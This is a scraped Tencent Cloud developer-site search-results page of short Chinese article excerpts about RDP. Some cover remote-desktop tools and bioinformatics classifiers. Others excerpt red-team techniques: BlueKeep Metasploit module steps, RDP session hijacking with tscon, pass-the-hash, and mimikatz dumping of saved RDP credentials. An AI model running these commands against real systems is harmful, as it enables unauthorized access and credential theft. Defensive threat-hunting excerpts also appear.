学习
实践
活动
工具
TVP
写文章

跨平台rdp协议、类rdp协议、非rdp协议的远程软件

developer/article/1909626 一般维护系统时(比如远程不了时)才使用vnc登录 正常情况下请使用mstsc等标准远程工具而不是webrdp 关于远程工具,继续往下看,刷新你的认知 RDP remote-desktop-clients https://www.parallels.cn/products/ras/download/client/ https://jumpdesktop.com/ 类RDP sunlogin.oray.com/download/ (server、client端软件相同) ②anydesk https://anydesk.com/zhs/downloads (server、client端软件相同) 非RDP www.radmin.cn/download/ (server、client端软件不同) https://www.nomachine.com/download(server、client端软件相同) 发散:非RDP 协议兼容QQ快捷登录,RDP协议不兼容QQ快捷登录 最好用的手机远程软件,非jump desktop莫属 这里贴一个jump desktop的apk,手机远程windows服务器的工具很多,最好用的是

1.5K30

web rdp Myrtille

结论先行:web rdp 软件Myrtille,支持server 2016/2019/2022系统 不需要输Server(:port),只需要输用户名和密码 安装完成后,在服务器内部验证的话,打开浏览器访问

62770
  • 广告
    关闭

    2022腾讯全球数字生态大会

    11月30-12月1日,邀您一起“数实创新,产业共进”!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    使用Frp内网穿透rdp端口

    frp_x.xx.x_windows_amd64.zip 编辑frpc.ini # frpc.ini [common] # 修改成服务端Ip server_addr = x.x.x.x server_port = 7000 [rdp ] type = tcp local_ip = 127.0.0.1 # 修改成RDP协议的端口,默认是3389 local_port = 3389 remote_port = 6000 启动frpc frpc.exe

    1.4K20

    RDP登录相关

    目录 查询和修改RDP状态 RDP开放端口 RDP历史登录凭据 事件ID(Event ID)&事件类型(Event Type) RDP登录成功历史日志 RDP登录失败历史日志 查询和修改RDP状态 首先肯定就需要判断 RDP是否开启了。 如果 fDenyTSConnections 项的值为 0,则表明已启用 RDP。 如果 fDenyTSConnections 项的值为 1,则表明已禁用 RDP。 0 关闭RDP服务: Import-Module RegfDenyTSConnections.ps1 RegfDenyTSConnections 1 RDP开放端口 RDP默认端口为3389,但是 那么,我们就需要知道RDP修改后的真正端口了。

    20210

    RDP的阈值怎么选?

    昨天有读者问我RDP的阈值怎么选,我只知道用默认的就行,并不知道原因。于是查了一下: RDP采用bootstrap 的方法检验结果的准确性。 因此在扩增子测序结果的分析中,RDP阈值一般都取50%。 ? 但是对于一些研究很少的生境,RDP在较高的分类水平效果可能也不是很好。 总结: 如果RDP结果中unclassified比例特别高,可能是因为群落比较新颖,RDP中的训练数据集不能很好的对其进行分类。 可以自己上传一些数据作为RDP训练集,或许也可以适当降低一些阈值牺牲一定准确性。 ? 参考: http://rdp.cme.msu.edu/classifier/class_help.jsp#conf ? END ?

    41531

    RDP漏洞_一啥后门

    RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息

    5310

    横向移动之RDP&Desktop Session Hijack

    文章前言 管理员在内部网络中广泛使用远程桌面协议(rdp),这允许系统所有者和管理员远程管理windows环境,然而RDP可以给攻击者提供各种机会来实施攻击,这些攻击可以用于红队场景中的横向移动,下面的攻击可以让 RedTeam获得凭据,劫持其他用户的RDP会话,并对远程系统执行任意代码,这些远程系统将使用RDP作为受感染工作站的身份验证机制。 RDP劫持 实施中间人攻击通常会导致凭据捕获,它正在对RDP会话执行这种攻击,这将允许攻击者为了横向移动的目的而轻易地获得域帐户的纯文本密码,seth是一个工具,无论是否启用网络级身份验证(nla),它都可以自动执行 RDP中间人攻击,实施这种攻击需要四个参数: 以太网接口 攻击者的ip 受害主机的ip 目标rdp主机的ip . ————> Server A Server A RDP ————> Server B Server B RDP ————> Server C 为了促进这种攻击,mdsec开发了一个批处理脚本(https

    48010

    SINTAX: 优于RDP的序列分类器

    和基于朴素贝叶斯方法(Naive Bayesian Classifier)的RDP相比,SINTAX效果相当或更优,且不需要训练数据集。 目前广泛使用的序列分类学鉴定工具有RDP,QIIME,mothur等。他们用的都是RDP的方法,但是所使用的的数据库不同。 直接说结果,作者拿SINTAX v1.0, RDP v2.12, QIIME v1.9.1, mothur v1.36.1进行了对比。 SINTAX 和RDP在V4水平表现相当,但是由于SINTAX过度分类错误率更低,其在全长16S和ITS上错误率更低,效果更优。 ITS门水平上的灵敏度SINTAX (98.3%) 显著高于RDP (81.8%)。 在16S全长水平上,RDP的过度分类错误率可达40%。这表明40%的新物种可能都被错误的注释成了已有的物种。

    63731

    红队攻击-对RDP常规操作

    RDP-Tcp" /V PortNumber 得到连接端口为 0xd3d,转换后为 3389 开启rdp服务 老版本和新版windows版本不一样 windows server 2003 开启: REG RDP会话劫持 2.1 前言 在我们拿到主机系统权限时,但是我们没有拿到管理员的凭据,增加用户又动静太大,但是我们通过rdp连接记录发现,管理员3天前(3天之内吧,前提是没有更改组策略设置以使用户断开RDP 会话后立即或短期注销,而是使“断开连接的”远程桌面会话长时间处于休眠状态)通过rdp登陆过此系统,那么我们就可以通过rdp劫持的方式,来“恢复”先前断开的RDP会话,而这种的好处就是攻击者会逃避事件监视器 这时候就可以PTH RDP,利用hash去认证rdp服务。 rdp_check.py /administrator@192.168.1.1 -hashes:hashes 总结 Rdp爆破就不说了 END

    49830

    CVE-2019-0708_RDP漏洞利用

    漏洞简介: 基于Windows系列服务器系列漏洞,在2019年5月15日被公开,级别属于高危漏洞,利用方式简单,通过3389端口,RDP协议进行攻击。 工具:360_RDP漏洞扫描工具(解压密码:qx) POC:https://github.com/n1xbyte/CVE-2019-0708 漏洞复现: 1. nmap扫描3389端口是否开放 2. CVE-2019-0708模块如果没有,则需要更新 apt-get install Metasploit-framework #更新msf模块 msf5 > use auxiliary/scanner/rdp /cve_2019_0708_bluekeep  #利用漏洞扫描模块 msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options   (scanner/rdp/cve_2019_0708_bluekeep) > run  #运行 一样的,直接爆 漏洞利用: 先安装或者升级pip3(如果以前安装了,就直接安装impacket库),再安装

    27130

    通过反向 SSH 隧道连接 RDP

    https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html 24 - 通过反向 SSH 隧道连接 RDP 区分正常的和可疑的 RDP 活动需要严格的区分标准,特别是在大型的网络环境错综复杂的多方(服务提供商、IT、网络和系统团队等)出于合法的目的和动态的方式使用相同的协议的场景下。 2、如何通过 SSH 隧道使用 RDP 细节在这篇文章中 https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel / Setup: PC01|10.0.2.17 (External Attacker System) <--- SSH (RDP - Account: PC02\IEUser) ---> PC02 https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/ https://github.com/Neo23x0/sigma

    1.2K20

    RDP远程桌面密码凭证获取

    前言 在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。 查看当前主机本地连接过的目标机器记录 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s 查看当前主机保存的RDP 凭据 cmdkey /list 查看本地用户是否存有RDP密码文件 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 选择密码文件 mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > dpapi.txt 通过Masterkey,使用mimikatz解密pbData数据,获取RDP

    9340

    RDP连接多开方法与利用思路

    文章前言 本篇文章我们主要介绍在拿下目标域内主机的情况下,如何多开RDP链接且使得正常登录目标主机的用户不会被强制下线或者发现 具体实现 测试环境 域内主机:Windows 7 主机地址:192.168.174.170 查看远程桌面的端口号 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp " /v PortNumber c、开启远程桌面 meterpreter > run post/windows/manage/enable_rdp d、关闭远程桌面 meterpreter > run

    64030

    hook rdp对外连接的账号密码

    首先介绍下Detours,该库是c++库,该库可以方便hook windows的api。

    59230

    RDP爆破定位内部攻击者

    如上图,登录类型 10代表的是远程登录,使用administrator尝试登录了48w次,确认服务器正在遭受RDP协议暴力破解攻击,攻击来源为内网的另一台服务器。

    89230

    利用 RDPWRAP 做 RDP 劫持的威胁检测

    利用 RDPWRAP 做 RDP 劫持 RDPWRAP 是一种能够在非 windows server 上启用多并发 RDP 连接的合法第三方工具,它能够让攻击者在受害者还在使用它们计算机的时候使用远程连接操作受害者计算机 fDenyTSConnections 参考: https://github.com/stascorp/rdpwrap 原文: https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html

    1.7K10

    CVE-2019-0708:RDP终极EXP爆出

    0x00 漏洞概述 ---- CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。 可以看到有四个.rb后缀的文件,接下来将它们放至相应的目录(rdp目录需要自己创建) rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit / rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/ ?

    1.5K40

    基于RDP的SSL中间人攻击

    RDP连接的类型 在开始之前,首先明确本文讨论了三种类型的RDP连接,包括: - RDP安全层(RDPSecurity Layer) - SSL(TLS 1.0) - CredSSP (SSL with 想办法使受害者连接到我们系统上的PoC工具(rdp-ssl-mitm.py),而不是其要连接的RDP服务器。 2. 该工具使用RDP协议,通过协商使其在交互过程中使用SSL。 3. 一旦连接被协商使用SSL,我们的工具就会用其自己(不可信的)SSL证书与RDP客户端协商一次SSL连接。这样就使欺骗工具有机会访问RDP客户端发送的信息明文。 4. 该工具也需要与正常的RDP服务器创建SSL连接,将RDP客户端的数据发送到该服务器。 这种攻击的唯一缺点是在创建所需的SSL连接之前,我们的欺骗工具必须通过RDP协议与客户端有一个简短的交互。 4、与RDP服务器创建SSL连接 同时,我们的工具也向RDP服务器发起创建连接的消息,并与其创建第二条SSL连接。

    99860

    Duo RDP双因素身份验证防护绕过

    至于如何安装和配置2FA双因素身份验证就不详细介绍了,请移步官网:https://duo.com/docs/rdp。 0x02 工作原理 1) RDP连接或控制台登录已启动 2) 主要身份验证 3) 通过TCP端口443与Duo Security建立的Duo Windows登录凭据提供程序连接 4) 通过Duo Security 的服务进行二级认证 5) Duo Windows登录凭据提供程序接收身份验证响应 6) 登录RDP或控制台会话 ? 手机端Duo Mobile应用中的DUO-PROTECTED(RDP保护)、DUO ADMIN(Duo仪表板保护)。 ? ? ? 注:如果执行ipconfig /displaydns命令没有找到Duo API DNS缓存记录,这时可以尝试新建一个管理员账户密码,然后用Microsoft RDP登录,再执行ipconfig /displaydns

    1.3K10

    内网渗透 | RDP会话劫持实现未授权登录

    对远程桌面的利用姿势有很多,本篇文章中我们来学习一下 RDP 会话劫持的相关利用姿势。 RDP 劫持的原理 系统管理员和用户通常可以通过 RDP 远程桌面登录指定服务器 3389 远程桌面,而攻击者可以通过可以特权提升至 SYSTEM 权限的用户,可以在不知道其他用户登录凭据的情况下,用来劫持其他用户的 ,先提权至 SYSTEM 权限,再劫持目标用户的 RDP 并切换过去。 高权限用户劫持低权限用户的 RDP 高权限用户劫持低权限用户的 RDP 会话利用起来比较简单,由于具有管理员权限,可以直接通过创建服务等方式获取 SYSTEM 权限。 创建劫持用户会话的服务: sc create rdp binpath= "cmd.exe /k tscon 2 /dest:console"sc start rdp ?

    1K40

    扫码关注腾讯云开发者

    领取腾讯云代金券